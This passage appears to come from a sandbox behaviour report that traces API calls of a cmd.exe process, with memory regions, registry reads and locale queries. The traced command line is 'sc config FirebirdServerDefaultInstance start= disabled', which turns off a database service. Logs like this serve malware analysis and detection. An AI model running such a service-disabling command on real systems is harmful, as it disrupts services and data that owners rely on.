"private_0x0000000004830000" filename = "" Region: id = 5232 start_va = 0x4c20000 end_va = 0x4c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 5233 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5234 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5235 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5236 start_va = 0x7ee70000 end_va = 0x7ef6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee70000" filename = "" Region: id = 5237 start_va = 0x7ef97000 end_va = 0x7ef99fff entry_point = 0x0 region_type = private name = "private_0x000000007ef97000" filename = "" Region: id = 5238 start_va = 0x4520000 end_va = 0x4523fff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 5239 start_va = 0x4530000 end_va = 0x4533fff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 5240 start_va = 0x4c30000 end_va = 0x4f66fff entry_point = 0x4c30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 338 os_tid = 0xcd0 [0124.795] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0124.795] __set_app_type (_Type=0x1) [0124.795] __p__fmode () returned 0x77ac4d6c [0124.795] __p__commode () returned 0x77ac5b1c [0124.795] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0124.795] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0124.795] GetCurrentThreadId () returned 0xcd0 [0124.795] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd0) returned 0x84 [0124.795] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0124.795] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0124.795] SetThreadUILanguage (LangId=0x0) returned 0x409 [0124.798] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.798] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x469fbdc | out: phkResult=0x469fbdc*=0x0) returned 0x2 [0124.798] VirtualQuery (in: lpAddress=0x469fbe3, lpBuffer=0x469fb94, dwLength=0x1c | out: lpBuffer=0x469fb94*(BaseAddress=0x469f000, AllocationBase=0x45a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0124.798] VirtualQuery (in: lpAddress=0x45a0000, lpBuffer=0x469fb94, dwLength=0x1c | out: lpBuffer=0x469fb94*(BaseAddress=0x45a0000, AllocationBase=0x45a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0124.798] VirtualQuery (in: lpAddress=0x45a1000, lpBuffer=0x469fb94, dwLength=0x1c | out: lpBuffer=0x469fb94*(BaseAddress=0x45a1000, AllocationBase=0x45a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0124.798] VirtualQuery (in: lpAddress=0x45a3000, lpBuffer=0x469fb94, dwLength=0x1c | out: lpBuffer=0x469fb94*(BaseAddress=0x45a3000, AllocationBase=0x45a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0124.798] VirtualQuery (in: lpAddress=0x46a0000, lpBuffer=0x469fb94, dwLength=0x1c | out: lpBuffer=0x469fb94*(BaseAddress=0x46a0000, AllocationBase=0x46a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0124.798] GetConsoleOutputCP () returned 0x1b5 [0124.799] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0124.799] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0124.799] _get_osfhandle (_FileHandle=1) returned 0x3c [0124.799] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0124.799] _get_osfhandle (_FileHandle=1) returned 0x3c [0124.799] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0124.799] _get_osfhandle (_FileHandle=1) returned 0x3c [0124.799] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0124.799] _get_osfhandle (_FileHandle=0) returned 0x38 [0124.799] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0124.800] _get_osfhandle (_FileHandle=0) returned 0x38 [0124.800] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0124.800] GetEnvironmentStringsW () returned 0x49d7dc8* [0124.800] FreeEnvironmentStringsA (penv="A") returned 1 [0124.800] GetEnvironmentStringsW () returned 0x49d7dc8* [0124.800] FreeEnvironmentStringsA (penv="A") returned 1 [0124.800] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x469eb40 | out: phkResult=0x469eb40*=0x94) returned 0x0 [0124.800] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x0, lpData=0x469eb4c*=0x88, lpcbData=0x469eb48*=0x1000) returned 0x2 [0124.800] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x4, lpData=0x469eb4c*=0x1, lpcbData=0x469eb48*=0x4) returned 0x0 [0124.800] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x0, lpData=0x469eb4c*=0x1, lpcbData=0x469eb48*=0x1000) returned 0x2 [0124.800] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x4, lpData=0x469eb4c*=0x0, lpcbData=0x469eb48*=0x4) returned 0x0 [0124.800] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x4, lpData=0x469eb4c*=0x40, lpcbData=0x469eb48*=0x4) returned 0x0 [0124.800] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x4, lpData=0x469eb4c*=0x40, lpcbData=0x469eb48*=0x4) returned 0x0 [0124.800] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x0, lpData=0x469eb4c*=0x40, lpcbData=0x469eb48*=0x1000) returned 0x2 [0124.800] RegCloseKey (hKey=0x94) returned 0x0 [0124.800] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x469eb40 | out: phkResult=0x469eb40*=0x94) returned 0x0 [0124.801] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x0, lpData=0x469eb4c*=0x40, lpcbData=0x469eb48*=0x1000) returned 0x2 [0124.801] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x4, lpData=0x469eb4c*=0x1, lpcbData=0x469eb48*=0x4) returned 0x0 [0124.801] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x0, lpData=0x469eb4c*=0x1, lpcbData=0x469eb48*=0x1000) returned 0x2 [0124.801] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x4, lpData=0x469eb4c*=0x0, lpcbData=0x469eb48*=0x4) returned 0x0 [0124.801] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x4, lpData=0x469eb4c*=0x9, lpcbData=0x469eb48*=0x4) returned 0x0 [0124.801] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x4, lpData=0x469eb4c*=0x9, lpcbData=0x469eb48*=0x4) returned 0x0 [0124.801] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x469eb44, lpData=0x469eb4c, lpcbData=0x469eb48*=0x1000 | out: lpType=0x469eb44*=0x0, lpData=0x469eb4c*=0x9, lpcbData=0x469eb48*=0x1000) returned 0x2 [0124.801] RegCloseKey (hKey=0x94) returned 0x0 [0124.801] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2982d [0124.801] srand (_Seed=0x5ad2982d) [0124.801] GetCommandLineW () returned="/c sc config FirebirdServerDefaultInstance start= disabled" [0124.801] GetCommandLineW () returned="/c sc config FirebirdServerDefaultInstance start= disabled" [0124.801] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0124.801] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x49d9d20, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0124.801] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0124.801] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.801] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0124.801] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0124.801] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0124.801] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0124.801] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0124.801] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0124.801] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0124.801] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0124.801] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0124.801] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0124.801] GetEnvironmentStringsW () returned 0x49d7dc8* [0124.802] FreeEnvironmentStringsA (penv="A") returned 1 [0124.802] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.802] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0124.802] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0124.802] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0124.802] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0124.802] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0124.802] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0124.802] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0124.802] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0124.802] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0124.802] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x469f918 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0124.802] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x469f918, lpFilePart=0x469f910 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x469f910*="Desktop") returned 0x1d [0124.802] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0124.802] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x469f698 | out: lpFindFileData=0x469f698) returned 0x49d05c8 [0124.802] FindClose (in: hFindFile=0x49d05c8 | out: hFindFile=0x49d05c8) returned 1 [0124.802] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x469f698 | out: lpFindFileData=0x469f698) returned 0x49d05c8 [0124.802] FindClose (in: hFindFile=0x49d05c8 | out: hFindFile=0x49d05c8) returned 1 [0124.802] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0124.803] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x469f698 | out: lpFindFileData=0x469f698) returned 0x49d05c8 [0124.803] FindClose (in: hFindFile=0x49d05c8 | out: hFindFile=0x49d05c8) returned 1 [0124.803] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0124.803] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0124.803] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0124.803] GetEnvironmentStringsW () returned 0x49d7dc8* [0124.803] FreeEnvironmentStringsA (penv="=") returned 1 [0124.803] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0124.803] GetConsoleOutputCP () returned 0x1b5 [0124.803] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0124.803] GetUserDefaultLCID () returned 0x409 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x469fa48, cchData=128 | out: lpLCData="0") returned 2 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x469fa48, cchData=128 | out: lpLCData="0") returned 2 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x469fa48, cchData=128 | out: lpLCData="1") returned 2 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0124.804] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0124.804] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0124.805] GetConsoleTitleW (in: lpConsoleTitle=0x49daa88, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.805] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0124.805] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0124.805] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0124.805] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0124.805] _wcsicmp (_String1="sc", _String2=")") returned 74 [0124.806] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0124.806] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0124.806] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0124.806] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0124.806] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0124.806] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0124.807] GetConsoleTitleW (in: lpConsoleTitle=0x469f730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.807] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0124.807] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0124.807] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0124.807] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0124.807] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0124.807] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0124.807] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0124.807] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0124.807] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0124.807] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0124.807] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0124.807] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0124.807] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0124.807] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0124.807] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0124.808] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0124.808] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0124.808] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0124.808] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0124.808] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0124.808] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0124.808] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0124.808] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0124.808] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0124.808] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0124.808] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0124.808] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0124.808] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0124.808] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0124.808] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0124.808] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0124.808] _wcsicmp (_String1="sc", _String2="START") returned -17 [0124.808] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0124.808] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0124.808] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0124.808] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0124.808] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0124.808] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0124.808] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0124.808] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0124.808] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0124.808] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0124.808] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0124.808] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0124.808] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0124.808] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0124.808] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0124.808] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0124.808] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0124.808] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0124.808] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0124.808] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0124.808] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0124.808] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0124.808] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0124.808] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0124.808] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0124.808] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0124.808] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0124.808] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0124.808] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0124.808] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0124.809] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0124.809] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0124.809] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0124.809] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0124.809] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0124.809] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0124.809] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0124.809] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0124.809] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0124.809] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0124.809] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0124.809] _wcsicmp (_String1="sc", _String2="START") returned -17 [0124.809] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0124.809] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0124.809] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0124.809] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0124.809] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0124.809] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0124.809] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0124.809] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0124.809] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0124.809] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0124.809] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0124.809] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0124.809] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0124.809] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0124.809] SetErrorMode (uMode=0x0) returned 0x0 [0124.809] SetErrorMode (uMode=0x1) returned 0x0 [0124.809] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x49d05d0, lpFilePart=0x469f23c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x469f23c*="Desktop") returned 0x1d [0124.809] SetErrorMode (uMode=0x0) returned 0x1 [0124.810] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0124.810] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0124.818] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0124.818] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0124.818] GetConsoleTitleW (in: lpConsoleTitle=0x469f4bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.818] InitializeProcThreadAttributeList (in: lpAttributeList=0x469f3e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x469f3cc | out: lpAttributeList=0x469f3e8, lpSize=0x469f3cc) returned 1 [0124.818] UpdateProcThreadAttribute (in: lpAttributeList=0x469f3e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x469f3d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x469f3e8, lpPreviousValue=0x0) returned 1 [0124.818] GetStartupInfoW (in: lpStartupInfo=0x469f420 | out: lpStartupInfo=0x469f420*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0124.818] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0124.818] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0124.818] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0124.818] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", 